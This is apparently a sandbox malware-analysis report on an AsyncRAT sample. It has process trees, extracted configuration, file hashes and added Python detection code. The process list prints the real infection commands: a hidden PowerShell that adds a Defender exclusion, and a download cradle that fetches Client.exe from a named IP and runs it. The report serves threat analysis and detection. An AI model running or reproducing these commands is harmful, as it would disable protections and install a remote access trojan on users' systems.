
Resubmissions

  • 24/08/2024, 19:10  240824-xvmgnsvarc  (score 10)
  • 24/08/2024, 18:56  240824-xlh3wstfpb  (score 4)
  • 23/08/2024, 11:21  240823-nf4mza1bqc  (score 4)
  • 23/08/2024, 11:13  240823-nbkz3azhrc  (score 10)
  • 23/08/2024, 11:10  240823-m9qsjashrq  (score 4)
  • 22/08/2024, 07:12  240822-h1kgyaxfpj  (score 1)
  • 22/08/2024, 07:06  240822-hxesaaxenm  (score 10)
  • 22/08/2024, 07:00  240822-hs54nsxdln  (score 10)
  • 22/08/2024, 06:36  240822-hc93patara  (score 8)
  • 22/08/2024, 06:32  240822-ha293awfnl  (score 1)

Analysis

  • max time kernel
    128s
  • max time network
    135s
  • platform
    windows10-1703_x64
  • resource
    win10-20240611-en
  • resource tags

    arch:x64, arch:x86, image:win10-20240611-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    22/08/2024, 07:06

General

  • Target

    http45.151.62.96setup.exe.txt

  • Size

    29B

  • MD5

    688fe12c2f39d3d739a04e6c89b1b22f

  • SHA1

    e2ea25ad47861e77b912026839666d3a99f5c90b

  • SHA256

    35e4cca77e38bd9beaf4a33c97a6f2464ca5ff63bbcf59831bd829b4683fda3c

  • SHA512

    f56694118d4adee2e0c65fb28c3ef86bc5db032656e2306e02e0f5b19706e260f0505ee97f5068d07ae5149a410a15eccd3ebc758d216a5549d7dc0de52834ac

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper
    http://20.199.84.103/Client.exe

Extracted

  • Family
    asyncrat
  • Version
    1.0.7
  • Botnet
    Default
  • C2
    127.0.0.1:1024
    20.199.84.103:1024
  • Mutex
    DcRatMutex_qwqdanchun
  • Attributes
    • delay
      1
    • install
      false
    • install_folder
      %AppData%
  • aes.plain
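The extracted config above lists two C2 entries, but only one is usable as an indicator: 127.0.0.1:1024 is the builder's default placeholder and will never appear in network telemetry, while 20.199.84.103 both serves the dropper over HTTP and listens for the RAT on port 1024. The Python below is an added example, not tria.ge code, that turns the config into IOCs, drops the loopback entry, and runs them over a few constructed connection and HTTP log lines. The log layout is assumed for the example and is not the report's Network tab.

```python
import ipaddress
from urllib.parse import urlsplit

# Values copied from the Malware Config above.
EXTRACTED_C2 = ["127.0.0.1:1024", "20.199.84.103:1024"]
DROPPER_URLS = ["http://20.199.84.103/Client.exe"]

# Constructed log lines (not from the report) in a simplified layout:
#   conn <ts> <src> <sport> <dst> <dport>
#   http <ts> <src> <host> <uri>
SAMPLE_LOGS = [
    "conn 2024-08-22T07:06:41Z 10.0.0.15 49712 20.199.84.103 80",
    "http 2024-08-22T07:06:41Z 10.0.0.15 20.199.84.103 /Client.exe",
    "conn 2024-08-22T07:06:44Z 10.0.0.15 49713 20.199.84.103 1024",
    "conn 2024-08-22T07:06:50Z 10.0.0.15 49714 127.0.0.1 1024",
    "conn 2024-08-22T07:07:02Z 10.0.0.15 49715 142.250.74.36 443",
]


def build_iocs(c2_entries, dropper_urls):
    """Return (c2_sockets, c2_hosts, dropper_paths) from an extracted config.

    Loopback or unspecified C2 entries (127.0.0.1 here) are placeholder
    defaults left by the builder; matching on them would only produce noise,
    so they are dropped before the IOC set is built.
    """
    c2_sockets, c2_hosts, dropper_paths = set(), set(), set()
    for entry in c2_entries:
        host, _, port = entry.rpartition(":")
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            continue  # hostname C2s would need DNS-log matching; none in this config
        if ip.is_loopback or ip.is_unspecified:
            continue
        c2_sockets.add((str(ip), int(port)))
        c2_hosts.add(str(ip))
    for url in dropper_urls:
        parts = urlsplit(url)
        dropper_paths.add((parts.hostname, parts.path))
    return c2_sockets, c2_hosts, dropper_paths


def scan_logs(lines, iocs):
    """Match each log line against the IOCs; returns a list of (verdict, line)."""
    c2_sockets, c2_hosts, dropper_paths = iocs
    hits = []
    for line in lines:
        fields = line.split()
        kind = fields[0]
        if kind == "conn":
            dst, dport = fields[4], int(fields[5])
            if (dst, dport) in c2_sockets:
                hits.append(("c2-beacon", line))
            elif dst in c2_hosts:
                # Same host, different port: the dropper was served from the C2 IP.
                hits.append(("c2-host-other-port", line))
        elif kind == "http":
            host, uri = fields[3], fields[4]
            if (host, uri) in dropper_paths:
                hits.append(("dropper-fetch", line))
            elif host in c2_hosts:
                hits.append(("c2-host-http", line))
    return hits


def verdicts(lines=SAMPLE_LOGS):
    """Verdict names only, in log order; the loopback entry never matches."""
    return [v for v, _ in scan_logs(lines, build_iocs(EXTRACTED_C2, DROPPER_URLS))]
```

Keeping the host-level match separate from the socket-level match is deliberate: a connection to 20.199.84.103:80 is the staging fetch, not the beacon, and the two deserve different severities in a rule set.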

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Runs PowerShell with its display window hidden.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Drops file in Windows directory 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\NOTEPAD.EXE
    C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\http45.151.62.96setup.exe.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:1848
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:512
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • NTFS ADS
    PID:2588
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4520
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:5108
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    PID:4136
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    PID:1844
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    PID:2900
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:4240
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:3804
  • C:\Windows\System32\NOTEPAD.EXE
    "C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\sasa.bat
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:4848
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\sasa.bat" "
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1552
    • C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      2⤵
      PID:3704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -c Add-MpPreference -ExclusionPath "C:\Windows\Temp\"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4840
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -c "(New-Object System.Net.WebClient).DownloadFile('http://20.199.84.103/Client.exe', 'C:\Windows\Temp\Client.exe')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:912
    • C:\Windows\Temp\Client.exe
      "C:\Windows\Temp\Client.exe"
      2⤵
      • Executes dropped EXE
      PID:2888
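The cmd.exe subtree above is the entire infection chain in four command lines: fsutil dirty query (which needs administrative rights and is commonly used by batch scripts as an elevation probe), a hidden PowerShell that adds a Defender exclusion for C:\Windows\Temp\, a second hidden PowerShell that downloads Client.exe into that freshly excluded folder, and then the dropped file itself. The Python below is an added example, not tria.ge code, that feeds those command lines (copied from the report; the parent PIDs, the event order and the benign control event are assumed) through a small set of process-creation rules and correlates the exclusion with the later download and execution inside the same process tree.

```python
import re
from collections import defaultdict

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process-creation events. Images, PIDs and command lines are the
# ones shown in the report's cmd.exe subtree; ppid values are assumed (0 = the
# parent was not recorded). PID 7000 is an invented benign control.
EVENTS = [
    {"pid": 1552, "ppid": 0, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\sasa.bat" "'},
    {"pid": 3704, "ppid": 1552, "image": r"C:\Windows\system32\fsutil.exe",
     "cmdline": "fsutil dirty query C:"},
    {"pid": 4840, "ppid": 1552, "image": POWERSHELL,
     "cmdline": r'powershell -w hidden -c Add-MpPreference -ExclusionPath "C:\Windows\Temp\"'},
    {"pid": 912, "ppid": 1552, "image": POWERSHELL,
     "cmdline": r'''powershell -w hidden -c "(New-Object System.Net.WebClient).DownloadFile('http://20.199.84.103/Client.exe', 'C:\Windows\Temp\Client.exe')"'''},
    {"pid": 2888, "ppid": 1552, "image": r"C:\Windows\Temp\Client.exe",
     "cmdline": r'"C:\Windows\Temp\Client.exe"'},
    {"pid": 7000, "ppid": 4000, "image": POWERSHELL,
     "cmdline": "powershell -NoProfile -Command Get-Process"},
]

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
EXCLUSION_RE = re.compile(r'Add-MpPreference\s+-ExclusionPath\s+"?([^"\s]+)"?', re.I)
DOWNLOAD_RE = re.compile(
    r"""DownloadFile\(\s*['"]([^'"]+)['"]\s*,\s*['"]([^'"]+)['"]\s*\)""", re.I)


def _root(by_pid, ev):
    """Walk ppid links up to the top of the recorded tree (cmd.exe here)."""
    while ev["ppid"] in by_pid:
        ev = by_pid[ev["ppid"]]
    return ev["pid"]


def triage(events):
    """Return (findings, context).

    findings: (pid, rule) pairs.  context: extracted (url, destination) pairs
    and the Defender exclusions added per process tree, so that the download
    and the execution can be tied back to the exclusion that enabled them.
    """
    by_pid = {e["pid"]: e for e in events}
    exclusions = defaultdict(set)          # root pid -> lower-cased path prefixes
    downloads = []                         # (root pid, destination path)
    findings, context = [], {"urls": [], "exclusions": exclusions}

    # Pass 1: per-process rules, plus what each tree changed in the environment.
    for ev in events:
        cmd, root = ev["cmdline"], _root(by_pid, ev)
        if ev["image"].lower().endswith("\\fsutil.exe") and "dirty query" in cmd.lower():
            findings.append((ev["pid"], "admin-check-fsutil"))
        if not ev["image"].lower().endswith("\\powershell.exe"):
            continue
        if HIDDEN_RE.search(cmd):
            findings.append((ev["pid"], "powershell-hidden-window"))
        m = EXCLUSION_RE.search(cmd)
        if m:
            exclusions[root].add(m.group(1).lower())
            findings.append((ev["pid"], "defender-exclusion-added"))
        m = DOWNLOAD_RE.search(cmd)
        if m:
            url, dest = m.group(1), m.group(2)
            context["urls"].append((url, dest))
            downloads.append((root, dest, ev["pid"]))
            findings.append((ev["pid"], "download-cradle"))

    # Pass 2: correlate across the tree, independent of event order.
    for root, dest, pid in downloads:
        if any(dest.lower().startswith(p) for p in exclusions.get(root, ())):
            findings.append((pid, "download-into-excluded-path"))
    for ev in events:
        prefixes = exclusions.get(_root(by_pid, ev), ())
        if any(ev["image"].lower().startswith(p) for p in prefixes):
            findings.append((ev["pid"], "execution-from-excluded-path"))
    return findings, context


def rules_hit(events=EVENTS):
    """Sorted unique rule names; convenient for assertions and dashboards."""
    return sorted({rule for _, rule in triage(events)[0]})
```

The per-process rules alone (hidden window, Add-MpPreference, a DownloadFile cradle) are each noisy in an environment where admins script Defender; the two cross-process rules are the ones worth paging on, because a tree that adds an exclusion and then drops and runs a binary inside it has no benign reading.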

Network

MITRE ATT&CK Enterprise v15


Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          1cfe572f8a58e5c315192b2262b19389

          SHA1

          0ee01be5ceb2f4c1769d1461a33900abb85879ea

          SHA256

          a166e551d09fc5f77e4ede547e3dc521b71f4b5c07b93f16de2b0f976fed6751

          SHA512

          7820fe3c45dd79a37c31d4a5a03a167b254f0e2eb5b9acf374944ffbebc3e2c919d494cdfcbf7d4d9e8142dac21d1c0e1c7e56fbfe337e8336e5302d88bcaa2f

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\ZVQ9VIUB\edgecompatviewlist[1].xml

          Filesize

          74KB

          MD5

          d4fc49dc14f63895d997fa4940f24378

          SHA1

          3efb1437a7c5e46034147cbbc8db017c69d02c31

          SHA256

          853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

          SHA512

          cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          1871e81a113b83a238af3e27b0f07047

          SHA1

          d38cc4cb6f38a75f67a0ce2cbac83b5ba626a584

          SHA256

          2931b37679d0858f2a7247aa6474677a5afd229d4974f52f47b68544b7e0a37f

          SHA512

          767322d491d778f08acad586215a2d31178353e708fd09a3afe88be202be55545bc95651cd8f25719db364cadbe29fccea6e23e42bb7a960e084eca1576ec656

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

          Filesize

          4KB

          MD5

          1bfe591a4fe3d91b03cdf26eaacd8f89

          SHA1

          719c37c320f518ac168c86723724891950911cea

          SHA256

          9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

          SHA512

          02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\A0N0VYON\favicon[1].svg

          Filesize

          1KB

          MD5

          73f25ae8dcc07b881abff4df6a8a2910

          SHA1

          cbe1ecd153cdb69879d896f1a6bea787b2be603b

          SHA256

          b44325257d9d25a3009f97d54d698a1ed6171ec6771ed87448e8fee752f5fe9b

          SHA512

          f8489cf9deca83a6c314dc26e25a55de613e24b06b677eaa25648c25bb1222f3baae904e034b31a99e73c7de84d1eab8e19d796bfa826af9cd58dcba5e2a97fe

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\A0N0VYON\suggestions[1].en-US

          Filesize

          17KB

          MD5

          5a34cb996293fde2cb7a4ac89587393a

          SHA1

          3c96c993500690d1a77873cd62bc639b3a10653f

          SHA256

          c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

          SHA512

          e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

        • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\WR5NOY2I\android-icon-192x192[1].png

          Filesize

          10KB

          MD5

          6f8794c494348dc51f0a8ad1ac097920

          SHA1

          8f2e865b954eb33f972d9435428d0b6efd72d44a

          SHA256

          8ac4b49a270c08994d79529e594d213de516246c569abcc87ca5b5a15a526ed3

          SHA512

          7918f1ae65c6e3d15660580caa8bb43bc8770e5369f03d99f5a717dba45b990e9a7d0667fce0fc8f6bd59bd543584b9b92cc86137e652893c0d701ce32c0ce46

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\6I0W0DVL\blank[1].gif

          Filesize

          148B

          MD5

          19517fb39a31be6b8d7ccf53ad84908f

          SHA1

          ebbcfdc6acc99f7aac3bf7fe72bc55f07f03f7e9

          SHA256

          3cb0e54babf019703fe671a32fcc3947aab9079ec2871cf0f9639245cc12d878

          SHA512

          be752ff4c7aa3ab46fdbd93555a17e422e7c8b8661f40f899f51ec9393b510dcb2e66436a4f2c78a42af77dd95e01a3438c88cfaa3e0b02694c1912d5294ee16

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\H7XAVNBU\Z064RD0L.htm

          Filesize

          1KB

          MD5

          eb94232b52be156f3487b1bed0b363c7

          SHA1

          3e57511c1165a87f36f9e56535a4771586cd55de

          SHA256

          8585d329157e3d2678dcdf0e5ce44e5c807c6e1de19c2d7049b14b0cfdc07423

          SHA512

          0cb7a667e42efcca74427b25ea0460f236673dac5efae85823c98a32edac98eb4d234d2192ee9530663c46cac9a3a82d4962366e087a2085c9862e0090fb780d

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\H7XAVNBU\sasa[1].bat

          Filesize

          7KB

          MD5

          90c3dfd74d6ab4b7b98777930ab44a23

          SHA1

          7f536fa9c3972c4416e8620335e39f9e93092103

          SHA256

          6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f

          SHA512

          aab364913c7f3972a136d2cf9241e46adf275bf74cdaedd0697746b4d0244a517a832154ead9849c36d2cc710c80e2754cff1d2b5c845041f0b5e0d6fd115a92

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\H7XAVNBU\unknown[1].gif

          Filesize

          245B

          MD5

          088e8e238b79e9ea2b4371abb91b1fea

          SHA1

          dc1cdfa814046ea64609c438e1777f55ff3aa86c

          SHA256

          15f5fd53009f61c653aa23d91334f9d7fa2fbd325eab859b68d77a45bb6a78b8

          SHA512

          3fd0722505117d869f0dda1f61644c30582e2a5e449452c8037c6c9360b4a4b1f11a8b5b9439a72be1a717ffdff7ee30c512d26740f6d0048cbe3ced4553e042

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\KZ17AUGQ\binary[1].gif

          Filesize

          246B

          MD5

          96bd4beed88ff93356586485c13e5d89

          SHA1

          399c2bc3d5ec4fdb4c7a597afdf19eeb64cbdf2d

          SHA256

          8a31e7855292e0a8c66c67ff92ea660743006d47de9f012193cbd123a17ba79d

          SHA512

          069a292c7e5d2e8d76964e901f4922ae8948151c235436cf8abc67e84011f983cd052142381b8d3c7a417f42b06797a6a226da48155d5905e7d92c9847b346cd

        • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\TVDOCEEK\text[1].gif

          Filesize

          229B

          MD5

          840e8b62bc6fd841c93d3af73bda9c40

          SHA1

          08ee70b4f29d27c84b7ab55c96b71c640a1e8163

          SHA256

          661d43fb30151a050da3b5cef49a2c7d0b01eeafdf1f4a001873406658b0f776

          SHA512

          6735b3ff8b6f8f174297449267f5f2480d0d5fa715fb8c412c18c1b51000c7f84e14594b97db260f20b81e785cb1ca718b52de7281dff711cb8803d802238ceb

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cdwdxfwq.ktl.ps1

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • C:\Windows\Temp\Client.exe

          Filesize

          47KB

          MD5

          fedb1274930bfa08a83480134a3f1412

          SHA1

          d47be6340ecd780274b98dad463749eb2d9d49fd

          SHA256

          a8fcd268b48c903e21500439d6754500d59d12d7d5d4e2c7ea737661fa8fe230

          SHA512

          ba1d2a9745b837c1f984577a5d96bff1b2c126d86fd75c7e763b085ea8440360899d383be10a7a6f31bbd87c215c3dfed82c03c15880e8f4ef336c411cb448b4

        • memory/512-35-0x000002430E100000-0x000002430E102000-memory.dmp

          Filesize

          8KB

        • memory/512-16-0x000002430F120000-0x000002430F130000-memory.dmp

          Filesize

          64KB

        • memory/512-0-0x000002430F020000-0x000002430F030000-memory.dmp

          Filesize

          64KB

        • memory/2888-1251-0x00000000001A0000-0x00000000001B2000-memory.dmp

          Filesize

          72KB

        • memory/2900-211-0x0000014303200000-0x0000014303300000-memory.dmp

          Filesize

          1024KB

        • memory/2900-354-0x0000014B6D930000-0x0000014B6D940000-memory.dmp

          Filesize

          64KB

        • memory/2900-214-0x0000014302180000-0x00000143021A0000-memory.dmp

          Filesize

          128KB

        • memory/2900-207-0x0000014302160000-0x0000014302180000-memory.dmp

          Filesize

          128KB

        • memory/2900-150-0x0000014302CA0000-0x0000014302CC0000-memory.dmp

          Filesize

          128KB

        • memory/2900-106-0x0000014301BF0000-0x0000014301BF2000-memory.dmp

          Filesize

          8KB

        • memory/2900-104-0x00000143016E0000-0x00000143016E2000-memory.dmp

          Filesize

          8KB

        • memory/2900-102-0x00000143016D0000-0x00000143016D2000-memory.dmp

          Filesize

          8KB

        • memory/2900-71-0x0000014B6E300000-0x0000014B6E400000-memory.dmp

          Filesize

          1024KB

        • memory/4136-56-0x000001AEE7290000-0x000001AEE7292000-memory.dmp

          Filesize

          8KB

        • memory/4136-59-0x000001AEE72C0000-0x000001AEE72C2000-memory.dmp

          Filesize

          8KB

        • memory/4136-63-0x000001AEE7400000-0x000001AEE7402000-memory.dmp

          Filesize

          8KB

        • memory/4136-65-0x000001AEE7420000-0x000001AEE7422000-memory.dmp

          Filesize

          8KB

        • memory/4136-67-0x000001AEE7440000-0x000001AEE7442000-memory.dmp

          Filesize

          8KB

        • memory/4136-61-0x000001AEE72E0000-0x000001AEE72E2000-memory.dmp

          Filesize

          8KB

        • memory/4136-49-0x000001AED6BC0000-0x000001AED6CC0000-memory.dmp

          Filesize

          1024KB

        • memory/4840-1192-0x00000132F4EE0000-0x00000132F4F02000-memory.dmp

          Filesize

          136KB

        • memory/4840-1197-0x00000132F5090000-0x00000132F5106000-memory.dmp

          Filesize

          472KB

        • memory/5108-45-0x0000020E81F40000-0x0000020E82040000-memory.dmp

          Filesize

          1024KB